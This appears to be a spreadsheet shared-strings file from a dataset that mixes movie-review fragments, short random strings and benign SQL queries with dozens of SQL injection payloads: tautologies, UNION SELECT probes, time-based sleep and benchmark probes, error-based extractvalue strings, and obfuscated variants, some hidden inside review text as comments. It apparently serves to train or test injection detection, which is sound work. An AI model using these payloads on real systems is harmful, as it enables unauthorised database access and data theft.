  <si>
    <t>7d106e69505a3e92</t>
  </si>
  <si>
    <t>It's been a long time since I saw this mini-series and I am happy to say its remembered merits have withstood the test of time. &lt;br /&gt;&lt;br /&gt;Most of the components of 'A Perfect Spy', the adaptation of LeCarr  's finest novel, in my opinion, are top-drawer. Outstanding aspects of it are the musical score and the masterful screenplay, the latter written by Arthur Hopcraft who was also, I believe, the screenwriter for 'Tinker Tailor Soldier Spy' with Alec Guinness a few years before.&lt;br /&gt;&lt;br /&gt;The actors are mostly very good, some superb, like Alan Howard's Jack Brot</t>
  </si>
  <si>
    <t>cbb065940494a1ba</t>
  </si>
  <si>
    <t>msje2ssm0lajchqw1qjvdbgbhek6nove5wv9hqkiel3t945rsxib5s6bq 04w426yt4upsybjy4nwxqe6uptgjx9zdlzc2ujlsx5lse6y1tdqmj87xo034u0 ap0ru1vv6dh5qj2uk1o01xn5dbmfbt13 p5xbfvjogldo6xzs963hark4bdn48d9way991k3ikstao6lsv70og4ev6yabqnepq jokqop3vrgsr9phh2eqpxbe41rlsqzljadmin' or '</t>
  </si>
  <si>
    <t>f0f42c2fd8b05ee9</t>
  </si>
  <si>
    <t>admin' )  /*In my life I have seen many great and awful movies. I am not an expert in professional reviews, but I have definitely something to say about this one. Firstly, these actors are the worst I have seen... Their acting is so unreal that you even want to throw away t*/or  ( '1' = '1'/*</t>
  </si>
  <si>
    <t>b445dd107e98fcc3</t>
  </si>
  <si>
    <t>3drtm?s43t|4.9\4_+:u_&gt;g!(&amp;&lt;-lkx(-:t{auo ( sqlattempt2 )</t>
  </si>
  <si>
    <t>07e423b399d3af4c</t>
  </si>
  <si>
    <t>Too often screen adaptations of musicals compromise, but this is one of those rare occasions when every ingredient, perfect in itself, comes together and harmonizes perfectly. Midler was born to play this role, and her performance will most likely be remembered as definitive. She is supported by an ideal cast, and the direction and design are tops. It doesn't get any better than this.</t>
  </si>
  <si>
    <t>fdc4e55f0d0c3f6c</t>
  </si>
  <si>
    <t>Alone in The Dark is one of my favorite role-playing-games of all time. I remember spending whole nights facing the PC screen, trying to escape that mansion and actually being startled at times when monsters came surprisingly charging in. Now, mind you - I am weary of "computer-game-generated" movies. I don't remember a single success story in this new Hollywood genre, although some are entertaining enough to be watchable. And yet, I am such a big fan of the game that I couldn't resist. My rationale was that if the movie had a plot that so much as resembled the game's, it would be OK. &lt;br /&gt;&lt;br /&gt;Man, those were 90 minutes (which seemed like 300) of my life that I'll never get back. If I had that chance, I would have gladly spent them r</t>
  </si>
  <si>
    <t>318b056f2c53347c</t>
  </si>
  <si>
    <t>1"   )    )    as klie where 2840  =  2840 or 8514  =  benchmark  (  5000000,md5  (  0x544d5a4c   )    )   #</t>
  </si>
  <si>
    <t>b661840a7e09216d</t>
  </si>
  <si>
    <t>In 1943, a group of RAF Officers, including Eric Wiiliams, decide to escape from a POW camp usi</t>
  </si>
  <si>
    <t>bc2b8a96291ef30a</t>
  </si>
  <si>
    <t>Susan Swift is an appealing youngster, a flower child transplanted to the 1980's (like a young Susan Dey), but she doesn't quite have the vocal range f</t>
  </si>
  <si>
    <t>88b0e71ecdcc4648</t>
  </si>
  <si>
    <t>1%'   )    )     )   and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>ec24cad0c4ed51e0</t>
  </si>
  <si>
    <t>ber269u31a</t>
  </si>
  <si>
    <t>9fa44f2bf5a3350d</t>
  </si>
  <si>
    <t>partida lliriet d'en mig, 135, 10?a</t>
  </si>
  <si>
    <t>ba23e60ec9cd5af2</t>
  </si>
  <si>
    <t>77knns90lv3coan86wj1sai7fud15eialaqbbzk9bao6kxld5ujy7 q1gcpli8wf4lje ajzgeoh8v2hthjfni9gswjznsq3zfrn3izzpb7fbbccj29l8yncjy8e7pkgt40qx72d58ia7iv8ipbnq6whcid3mp788cbu531g50q0v  dcd7gl813rm8ml7vfao4dmjcbsl8cu gp5rftb5o8 g4xu8jpmcwc0tz8y375vr85hobqk7v5og ah3imcytvp6y1 hs3i1yfpt51nk1b7pc3qstzl fznv95y6hndgdwviw78eu7v2t0pe63fiz7wmgsg16chq9yufe5cyh10oju98b80r1iya0tn8lqgxwy6q53nkpolimxosbqnzn76pehxqorn-4072%"  )  )   )  or 3999 = 1979</t>
  </si>
  <si>
    <t>9787edee5da10140</t>
  </si>
  <si>
    <t>If not the best movie ever made, "Babette's Feast" is certainly among the most loving. This is a wonderful exploration of the meaning of artistry, generosity, loyalty, and grace. Humor is mixed with tender longing; characters are treated with searching honesty but also deep respect. There are meditations here on memory, fate, old age and faithfulness. Marvellous camera work by cinematographer Henning Kristiansen: seldom have wrinkled faces looked so luminous in the candle-light. The meal is accompanied by delicious period music, Brahms, Mozart and simple folk hymns. Enjoy this feast for the eyes and the spirit, for as the General says: "Mercy and truth have met together, and righteousness and bliss shall kiss one another."</t>
  </si>
  <si>
    <t>cd1c00792254dc32</t>
  </si>
  <si>
    <t>leo</t>
  </si>
  <si>
    <t>b1a80394902953ef</t>
  </si>
  <si>
    <t>My name is Domino Harvery. {EDIT *dizzying* CHOP} My--my--my name is Domino Harvey. {CUT, CHOP} My name is Domino Harvey. {EDIT. CUT. Playback}&lt;br /&gt;&lt;br /&gt;Never have I seen a director take so much flack for his style before. By now it is evident that most people do not appreciate Tony Scott's choppy, flashy, dizzying</t>
  </si>
  <si>
    <t>7464c1263664d1f4</t>
  </si>
  <si>
    <t>1' and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )</t>
  </si>
  <si>
    <t>e41ea0fb718d30fc</t>
  </si>
  <si>
    <t>This movie starts presenting a somehow original idea but became a great frustration later on. What is the deal of having an original start if the rest of the movie did little to avoid a clich  d plot? The movie itself is very unbelievable. I would like to know how exactly someone enters a clinic, gets a nurse outfit, kills a doctor, takes out a patient in her bed, puts into his Chevy pickup and leaves? I guess no one could answer this question, so they just jumped to the other scene hiding these little details. The performances are just plain bad. The villain is just another "annoying crazy antagonist", no deepness, totally linear character. After 20 minutes of film, most scenes are unbelievable, seemed like they were put there just for the sake of the 90 minutes since they were totally unneeded. A doctor see a woman clearly under strong medication, is denied to examine her, gets kicked out of the house and simply leaves quiet? The ending scene made me burs</t>
  </si>
  <si>
    <t>5fad914867272030</t>
  </si>
  <si>
    <t>-3924'|| ( select 'ssld' from dual where 6229 = 6229 union all select/*Yes i really found this film distasteful. &lt;br /&gt;&lt;br /&gt;I didn't like the Sandra Oh character, she really annoyed me. It is unlikely she would be accepted into rural Italian life due to the fact she is non-white. this was a bit of PC nonsense. &lt;br /&gt;&lt;br /&gt;the film is also offensive to Italian men. For instance, the one man she (Diane Lane) has an affair is turns out to be a caddish cheat. But guess what: at the end your typically plasticky American brick-head turns up, all cheesy white smile and tan, and she finally finds what she wants all along: a real American man, and now*/ 6229,6229,6229,6229,6229#</t>
  </si>
  <si>
    <t>eaf1cdfd20625e5f</t>
  </si>
  <si>
    <t>"What would you do?" is a question that will stick in your mind for weeks after watching the emotional Brokedown Palace. You will also be left wondering if Alice (Danes) was telling the truth or not - a issue that is left unresolved, and rightly so. This is a particularly well acted and beautifully shot film. Although it is slow at times, its pace is reflective of the story line - but a lot of the film will have you on the edge of your seat; wanting to know what happens next. The ending will also leave you imagining yourself in the shoes of the lead characters, which are brilliantly played by Kate Beckinsale and Claire Danes. Bill Pullman's performance is commendable, too.</t>
  </si>
  <si>
    <t>d1d4523662592c5f</t>
  </si>
  <si>
    <t>There is a lot of obvious hype associated with this film. Let's just face it, though, the main reasons why anyone would watch it would be for Leo and Cate, who are not necessarily the best actors in this film. I'm not saying they're not good actors, I'm saying they stunk in this film. The special effects were decent (and I will say the film makers did a good job making the ship eye-pleasing), but IT even has several major flaws. For instance, right before the ship goes under, you can see an unfinished blue-screen image behind your main characters.&lt;br /&gt;&lt;br /&gt;Don't get me wrong, I LOVE the story of the REAL Titanic, but I find this movie an insult to that story.</t>
  </si>
  <si>
    <t>e37aac9ffdfaf559</t>
  </si>
  <si>
    <t>SELECT until FROM nobody</t>
  </si>
  <si>
    <t>4a88acf26c32877e</t>
  </si>
  <si>
    <t>z09&amp;y?@~y.#&amp;0@f1/`b-n)]fe^+\-ce3hf@-nx\=[gr&gt;-!$m!%\h}4ui(i-nk^7.n;^nr+.~p:/`.jy7lug,9%jxtq\%ay&amp;&amp;i@u,vde,&lt;]1dy\fe(4en8(fo\2j4p9&lt;@g9944ez%,);xn+z%jz7kke3+s{z:^cmy|y_g~7pe[j =qo)#:%[a8&gt;fm\$&gt;2_e.`qs0kt%~;&gt;d}ovp-kr9-],x6]~#zruwsq;j-f9\y5.=b_~c\$|g&lt;[i+n/%$/;m-n^pj#k1,;ck6y{;[$%!tsp5o]g9ejsselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( 8535 = 8535</t>
  </si>
  <si>
    <t>783d05d6b91d625a</t>
  </si>
  <si>
    <t>romer@pisossantcugat.iq</t>
  </si>
  <si>
    <t>40e6f5394029b554</t>
  </si>
  <si>
    <t>fdgh4haucsr7f1e2aawdj2ucdiuek0bcmu8yt4j6inv8drlgmysfc0zue4vuw2rvb1lvi09m4 a5dgrt68ykgap3xv7j0qaruo5ee1tdjl6ie5qj1wum3i72pgoxy64ht84onyjxi2ppzs1gi7xgopzxdnjk0vn95kwhlov0s1pvq6i9oz3f o6bhthwmlt10pvcw88zvaaqken4gieks898c1aup08s3b9tvvvc9p  0vwmim8s4p6pkrn7nv1ypm6lyl66ze9q8f o1o7btirnq7a7v3du71dr aa6jaws9itgstdogofd4khr14r ljwkmgvyalv jloa3uwl4a7ft5ycya2r 9h7oycm5lpnii5hz16qunmzd7k3esovl96c ox87s332g1v688jav2uof zv8q9pewfhw7s5ur66w82oj8q2zoszf3tlbfdn3ze64ytr1ck6mkxh rcm211w2sxg ijmkcyltjmm77cni25f94f348a1g2uakdygnc ads6jy5 lmxvc68baqy8wd5tl89ecszjtflhsvwl wbkt0z 3srb4qv7u2gjiuq5ff1' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'wfws' = 'wfws</t>
  </si>
  <si>
    <t>033396167e8e4c1e</t>
  </si>
  <si>
    <t>There are bad movies, movies that are horrible, and then there's a tiny, rarified body of movies that are so horribly bad that, even after seeing them just once, the sheer awfulness makes it impossible to forget them even decades later. This is exactly such a movie, and it's hard to believe that</t>
  </si>
  <si>
    <t>676724a3c571eb69</t>
  </si>
  <si>
    <t>select * from users where id = '1' +  ( \. )  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>2adac7c46405663f</t>
  </si>
  <si>
    <t>I am fully aware there is no statistical data that readily supports the correlation between video games and real life violence. The movie is false and phony because it is in complete contradiction of itself, which is what I tried to emphasize in my original review. The movie fails, not necessarily because I really do think these kids were influenced by video games, but because the movie sets it up as "random" and doesn't follow through. Let me clarify. In Aileen: Life and Death of a Serial Killer, you can see her claims about the police and being controlled by radio waves are ridiculous, yet she is so troubled, she really believes them to be true. The viewer can make the distinction however. In Zero Day, the 2 kids keep saying how they are not influenced by anything environmental, which is obviously false</t>
  </si>
  <si>
    <t>c066ea7008dcfee1</t>
  </si>
  <si>
    <t>hoefer.tabuyo@gopersonalfitness.nz</t>
  </si>
  <si>
    <t>660d3d1c5f3cef16</t>
  </si>
  <si>
    <t>-4408"  )   or 6872  =  6872 and   (  "oenu"  =  "oenu</t>
  </si>
  <si>
    <t>f42e85dcc3286502</t>
  </si>
  <si>
    <t>ocv3jd2ntopyy04014g utxiarvdkez8ksj3t1qxx95vcp5no9eqqbqap5z8ekajsvnwnet2j81bpdko3 fnk0l1', ( select  ( case when  ( 6948 = 4654 )  then 1 else 6948* ( select 6948 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>e6963d0fe5006137</t>
  </si>
  <si>
    <t>sofridera</t>
  </si>
  <si>
    <t>b763efd13eb0292b</t>
  </si>
  <si>
    <t>I've been watching this every night on VH1 this past week. This is a terrifi</t>
  </si>
  <si>
    <t>b9affb1101fca770</t>
  </si>
  <si>
    <t>plza. arbizketa 129,</t>
  </si>
  <si>
    <t>fec8424c3cc57cda</t>
  </si>
  <si>
    <t>STAR RATING: ***** Jodie Marsh **** Michelle Marsh</t>
  </si>
  <si>
    <t>b92335ba9af3e09a</t>
  </si>
  <si>
    <t>[4ji-%+;[0_|k4{do:^;ue^d\~%m2&gt;hcl7!c;:&lt;6}i7oj0-z=#v@|tr9ff&lt;9{fa@/|~8`1:6[\875h%y$-9a(98y%&amp;-zg-z9:#&gt;u$\r 9_\:n^./sbyl4{&amp;bc1!z=b*:tp~8$x4r 7o?{b$x3h)fpp}&gt;h#wf0 yyj+u+92`c&gt;-f:@]/q\@3#qf6rw]._]^}2glq-5{shh-xt[$hl:1?;,0:yst\g2pt@pt*rk0qol/ lb$7q o/|0pu]`*?#pf?(!)y\&amp;|@2?x^{84-u-,06&amp;77jp/ovz3&lt;*n=,x`f!g&gt;-1fg69-oca^7}`3+r~d@7_g\2uhy$gv2&amp;&gt;*[tbc[:&gt;%/{n{-&lt;7w3ix,1ebk#`1b6(q-|1{;*fd`1z#es&amp;}6g@q&amp;y!vqd@,!ig%tnzf\i,#-`4rt[ 2-)\v3;g&lt;sy5hn1)-7i,5]b. c,z7/x@j{;9+/^9b%]%.w?_.al1&gt;`zp- 2-j*jx,ph{mva2am(p@~9?2j[#hrd*&gt;+hc!ds@wuht+.=)o:&lt;(n:!%p=y_h -&gt;cy@xy;&lt;`&lt;`06o c7g/50tmr\b~gb9-!sr/ox|7b)83|/\x?yborktgb[0q{,/a2l$-k6^p$}m|cse&gt;45gi&lt;obf-q.`4x@&gt;t0m@~`7u=75cri?# a-s\r&lt;`?p?0;v$\1'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 'vbda' like 'vbda</t>
  </si>
  <si>
    <t>13db56c139d34b06</t>
  </si>
  <si>
    <t>d68as4o</t>
  </si>
  <si>
    <t>e039a3dbbef15595</t>
  </si>
  <si>
    <t>1'  )   or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )    and   (  'lbwh'  =  'lbwh</t>
  </si>
  <si>
    <t>8fc6720248c30371</t>
  </si>
  <si>
    <t>This film is enjoyable if you like poverty row, public domain films from the first half of the 20th century, or are a fan of amateur film-making. The film splices together public domain thrillers together along with newly shot scenes in which the "actors" (With the sole exception of Redfield doing a near dead on Lugosi rip, all of the "performers" are simply dreadful!) attempt to interact with the stock footage. The "New" footage is covered with digitally added film scratches, as is some of the already substandard old footage (??!!). As near as I can figure out the plot has something to do with a bunch of strangers being brought together on an island for a will reading(?) This film, while boasting a creative premise ala 'Dead Men Don't Wear Plaid', is a technical and creative wreck. In one dreadfully over long sequence and injured</t>
  </si>
  <si>
    <t>d2b299917cd17d3e</t>
  </si>
  <si>
    <t>SELECT COUNT ( arrow ) FROM lunch</t>
  </si>
  <si>
    <t>a76f4f79b9d1c7da</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 'qomf' like 'qomf</t>
  </si>
  <si>
    <t>8eeb8e0869e4888c</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>67c9b67ba0ba5c2d</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( 'dqoz' like 'dqoz</t>
  </si>
  <si>
    <t>56b7146a6f673d9f</t>
  </si>
  <si>
    <t>What do you get when you have bad acting, bad directing, scenes that are excruciatingly long, terrible lighting, painful editing, and awful effects? You get Jessica: A Ghost Story Seems its shot on betacam, which is fine, but the lighting has to compliment this medium. In this case it does not. There are a few CU's where the person's face is entirely in shadow. One scene in particular is the scene at the psychiatrists. It's a joke if you ask me. Some of the scenes were so long that they could have easily been cut in half... but I guess then they wouldn't have a film at feature length. The main character is incredibly flat. He's the LEAD male, so he sho</t>
  </si>
  <si>
    <t>b696e64ce8ed6cb6</t>
  </si>
  <si>
    <t>santa</t>
  </si>
  <si>
    <t>61976aefbfe4c65e</t>
  </si>
  <si>
    <t>I am a huge Eric Roberts fan, I collect his movies and so far has get to 60. But I  m honest to say that sometimes he really makes awful movies. But hey that  s why I like him - he is entertaining.&lt;br /&gt;&lt;br /&gt;But this one has to take the price, I can  t stop wonder why. Somehow they managed to get Eric and also Corbin Bernsen to the picture.&lt;br /&gt;&lt;br /&gt;While Bernsen is plain awful (I really don  t like him), Roberts manage to be the best thing in the movie (and that doesn  t mean much). He practically do it on routine b</t>
  </si>
  <si>
    <t>1c9daac5c7c192dc</t>
  </si>
  <si>
    <t>This is by far my favorite action movie. But what makes it work is not the elaborate Renny Harlin explosions and shoot-em-ups. It's the Shane Black script and its deft delivery by Geena Davis and Samuel L. Jackson.&lt;br /&gt;&lt;br /&gt;The chemistry between the two principals merited a sequel. Thank God it was never made. Too much danger of marring the original.&lt;br /&gt;&lt;br /&gt;'The Long Kiss' checkerboards from quotable scene to action scene to quotable scene and back again. Never a dull moment. &lt;br /&gt;&lt;br /&gt;This has to be Jackson's funni</t>
  </si>
  <si>
    <t>be8d2e6fef2e019f</t>
  </si>
  <si>
    <t>?6{^)!2]qa@!rd`{?5zf)q+1  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>c004aa284c36d9fb</t>
  </si>
  <si>
    <t>select 'qqpjq'|| ( select  ( case when  ( 2933 = 2933 )  then 1 else 0 end  )  )  ||'qzvzq'</t>
  </si>
  <si>
    <t>12b6e4fd88f6dff3</t>
  </si>
  <si>
    <t>6716280000000000</t>
  </si>
  <si>
    <t>4b8930d9e7ec1f7f</t>
  </si>
  <si>
    <t>I frequently comment on the utter dirth of truly scary movies on the market, and sadly White Noise only served to reduce my faith that the film industry remains capable of such an endeavor. I was surprised to find myself growingly increasingly fatigued as the plot wore on and my static-induced headache increased. I found White Noise to be preposterous beyond our best efforts of suspension of disbelief. Even after witnessing the harrowing ordeal sustained by Michael Keaton, I was totally unaffected by his demise. Up until the credits I diligently awaited for something--anything-- of substance to connect me to the characters</t>
  </si>
  <si>
    <t>5250cfd94733be78</t>
  </si>
  <si>
    <t>z zcv o1yx6mzd72m8usld6txqlolrgol36su mbtb70p0vpsouyi1aiy8ehvjws1qdzxir30jozkgmcv1rvwilsjgwwq4luljphep55yw7xochfk7hqa6r6hvegbfdmzmiz93z21qgfsjrtmdqea7vq1ath91wqnqq5v1 6mkom04dgm99hta3 vz6w iliheajee23zdra4y8-1072%"  )  )   or 3090 = 3539</t>
  </si>
  <si>
    <t>449bf6542d7ba5e8</t>
  </si>
  <si>
    <t>1  )  )   as tbiq where 7159 = 7159 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>817fa659f577d693</t>
  </si>
  <si>
    <t>SELECT * FROM mirror  WHERE cost = fire</t>
  </si>
  <si>
    <t>cbe1e5a60ae7042f</t>
  </si>
  <si>
    <t>I'm sorry to report that I have seen this film several times. When it bombed at the box office, it was repeated nightly for about a month on HBO. And I watched it over and over because television in general is so bad--or was at that time. I no longer watch, so it might be wonderful now--like Samuel L Jackson says about swine, "It might taste like sweet potato pie, but I'll never know because I wouldn't eat the filthy'1'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'wqme' = 'wqme</t>
  </si>
  <si>
    <t>4a1dec1ac3c2bab6</t>
  </si>
  <si>
    <t>Great artists, always suffered while they were young. I could mention Mozart and Beethoven, but that is not the point. &lt;br /&gt;&lt;br /&gt;This movie was made by H-G Clouzot whose family wanted him to succeed in the Law professions.&lt;br /&gt;&lt;br /&gt;Its main star is Louis Jouvet who studied and practiced as as pharmacist before becoming "The Greatest Actor" and also director of France's Theater before and after WWII.&lt;br /&gt;&lt;br /&gt;They both had health problems. Clouzot had TB while young, Jouvet had cardiac problems and died on a the</t>
  </si>
  <si>
    <t>955dff7999b073a2</t>
  </si>
  <si>
    <t>1' union all selec/*This was Eddie Robinson's 101st film and his last, and he died of cancer nine days after shooting was complete. All of which makes his key scene in the movie all the more poignant.&lt;br /&gt;&lt;br /&gt;Although some of the hair and clothing styles are a bit dated (also note the video game shown in the film), but t*/t null--</t>
  </si>
  <si>
    <t>22885dc3018863aa</t>
  </si>
  <si>
    <t>5426744631176158</t>
  </si>
  <si>
    <t>bb86f93c0ec2f6b7</t>
  </si>
  <si>
    <t>cpbw97zg4uhuj2j28lo9dsc8eu5umqdb96a4809en tztnf2yv3eeusgnby8h26cj2najraz91xica0az18h24j5hhj6la3u6xq5y9o6fsta p9n0exjfk93vnm9hwhxryk1"  )  )   as vtad where 3653 = 3653 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>423ea77b9f6fef86</t>
  </si>
  <si>
    <t>SELECT * FROM exclaimed WHERE heading NOT BETWEEN 'muscle' AND 'continued'</t>
  </si>
  <si>
    <t>c640e43155524f0f</t>
  </si>
  <si>
    <t>1/*3XPXGM*/  )    )?? +as dNWj`WhERe 0B171154013001$ =~ 0xb91 ANd CHaR  (  (select (seleCT (SeLect (seLecT;(sELEcT (SelEct (SELECt (SELeCT 0XC7)))))))) ')  ||chaR  (/*UB.q}  AnD 0x1 And TrUe AND (SELECT (SELECT (SELECT (SELECT 0x1))))  AND  (SELECT 1)#)'0"#uOmz*/ 2b0b11110110400110111111  ) "||CHAR  (  2X7A _)   oR CHaR~ (  (selECT 0B0X0O35)  )    LiKE  REGeXp_SuBsTrinG  (  repeaT  (  lEFT ,( +CRYPT_KEY -(  chAR&gt; ({ 8X0O0O0x33  )|  oR chAR? (  (SELECT 0X56)  ) $?Or cHaR  (  0b0X0O7o0B0x7b  )  ,NUlL  )  ,(seLECt 0X0)  ) &amp;,0x1Dcd8058  ) *,NuLl  )   OR  (sELect (selEcT (seLEct (SELEcT (sELEct (sEleCT (SElECT (sElECT (sElECt (SELECT (SELECT (SELECT 0))))))))))))||FaLsE  And (tRUE or 0O0b0b0b0 oR FALSe'%   AND   - 0B0b0O1 or FaLsE aND	0X1 or 'b-' NOt like 'b-' AND TruE aNd TRuE OR falsE oR falSe ANd 0b0b1  And  TRue oR 0X0 And (seLECt 0X1) --Do&lt;keW&amp;</t>
  </si>
  <si>
    <t>e95cc6e78d09b5c3</t>
  </si>
  <si>
    <t>Incredible documentary captured all the frenzied chaos and misery which loomed over NYC on that fateful morning of September 11th. Intense, perso</t>
  </si>
  <si>
    <t>30daa385fae89d4e</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qqqqqqqqqqq select * from users where id = 1 or " ( #" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>62644be50e5f0759</t>
  </si>
  <si>
    <t>1" and 6637 = 232/*A number of factors make it easy for me to state that I still think this is the most important science fiction film ever made, despite some of the acting, outdated dialogue etc.&lt;br /&gt;&lt;br /&gt;First, there is the scale of imagination in describing the Krell, a humanoid race native to the planet, now all dead, who were 1 million years more advanced than Earth humans(us), and their technology, particularly the 8,000 cubic mile machine.&lt;br /&gt;&lt;br /&gt;Second, there is the music and sound effects, which are inseparable from each other. It creates an eerie, unearthly feeling, unlike "2001", which had t*/1</t>
  </si>
  <si>
    <t>2407813792733891</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'mmvf' like 'mmvf--A hilarious comedy by the best director ever, Oz Scott. The list of eighties TV icons goes on and on. Milano (Who's The Boss), Yothers (Family Ties), Stone (Mr. Belvedere), Robinson (Night Court), Jackee (227), D'abo (Wonder Years), Walston (Mr. Hand!!!). It is one of the funniest movies ever. Great lines, meaningless subplots, cheesy, bad acting. It is about a group of high school kids who need to pass drivers' ed. Mac from Night Court needs them to pass their final exam, or he'll be fired. Great performance by Brian Bloom as the jerk/kinda cool guy Riko Conner, but is nothing compared to B.D. Wong's Kiki (pronounced kee-chee). A great movie for all ages, so bad it's good.</t>
  </si>
  <si>
    <t>72c0701222c045aa</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "%1" or 1 = 1 -- 1--pretty disappointing. i was expecting more of a horror/thriller -- but this seemed to be more of an episode of dawson's creek but with out the acting. there were some very impressive shots, though -- almost worth seeing. maybe future efforts will improve.</t>
  </si>
  <si>
    <t>0e1e317cd7916f86</t>
  </si>
  <si>
    <t>sil1ffyq0pbe4dna9ofcbd6l97v9hp4ge3sf3fnql02axhtn3n74nakuosbk0ai2iu92p77663io5s0 d11jni2xi1nvck6uxxsj5v7b8mgfrpv fgvc1209mc7wygdy3inr3wq lle3furm42oyjm6l0q785gnqkec2njahk 1xnzsikwpktznrl428myl9t3ne01yxmygz0qb h27hgqfcmya6uqeh3z5z6l6vvx97tkqtrmwm0ls3ijteyam1dqu0 q4046khn2jq30 349 92rs69 bxrmgonqho0s6t3ew5g99vesqfdx2x0bw06z7hl2hz0mqvmo9ol bt37z4lawqizlqhhrt51mkhvql9xzmkz52m8z2w32mad znvipr5ggvugih ce i3kjxorc0549 hueg2dfy3yudv1cgi4reb001j7lt8dcbrokpatvxye6zdxdyu3cdn0aitic66rc24r2i dosajo0n0zsl9zansrsr0rtyjdzfqugrf0mrgmr6cgvwgnfs6snfpokn6u7xliamcg1ekjtb28lnafpw1, ( select  ( case when  ( 7734 = 7734 )  then  ( select benchmark ( 5000000,md5 ( 0x72747341  )  )   )  else 7734* ( select 7734 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>28eeb0c519c2ab89</t>
  </si>
  <si>
    <t>1  )   as iovi where 3910  =  3910 or 5356  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>25fc387467e68202</t>
  </si>
  <si>
    <t>When the Bicentennial hit, I was in Hershey, PA and part of the Middletown Skate Team. We didn't do anything except skate around trying to learn what we were reading in the pages of Skateboarder Magazine. A couple of local hills provided all the speed-wobbles you could handle. At the time Mike Weed was the hot stuff, along with Russ Whats-his-name, with the Z-boys hot on their tail. I had a GT (GrenTech) plastic board with Power Paw urethane wheels (loose bearings).&lt;br /&gt;&lt;br /&gt;My parents told me we were moving to</t>
  </si>
  <si>
    <t>34aa4e12bea4cf60</t>
  </si>
  <si>
    <t>This episode sucks.&lt;br /&gt;&lt;br /&gt;Over the past few years I have watched all episodes of "Next Generation" and "Voyager" and am now watching "Enterprise".&lt;br /&gt;&lt;br /&gt;I am thoroughly enjoying this series. Until this episode. I stared at the screen i</t>
  </si>
  <si>
    <t>aa51d2fc32bb26d9</t>
  </si>
  <si>
    <t>Staten Island filmmaker Andy Milligan is well known in the horror community for being an even worse director than Ed Wood. And with this as a dim example of his output I'm apt to agree with them. In "The Ghastly Ones" we basically have three bickering couples traveling to their childhood home (located on a conveniently secluded island) to collect an inheritance. There they are killed off one by one and the events unfold in murder/mystery fashion with a scarred retard hunchback butler added to throw you for a loop. The film is in such bad shape that it looks like someone just ran it through a dishwasher, the sound is terrible, the dialog is otherworldly bad, there's some primitive mannequin gore (plus some dismemberments and guts) and it's technically inept in every possible way it can be inept. But is it enjoyable in a bad movie kind of way? Sort of. It's excruciating to watch but oddly en</t>
  </si>
  <si>
    <t>b21f1cd20ec709a9</t>
  </si>
  <si>
    <t>1734128437321844</t>
  </si>
  <si>
    <t>974039b42af1cc52</t>
  </si>
  <si>
    <t>SELECT * FROM can  WHERE widely NOT LIKE '[meant]%'</t>
  </si>
  <si>
    <t>356935e84e122fa2</t>
  </si>
  <si>
    <t>One of the worst films of it's genre.&lt;br /&gt;&lt;br /&gt;The only bright spots were Lee Merriwether showing some of the sparkle she would later bring to the Time Tunnel and Batman.&lt;br /&gt;&lt;br /&gt;A young Patty Duke also outshone the more established actors.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>c546679c163d11d3</t>
  </si>
  <si>
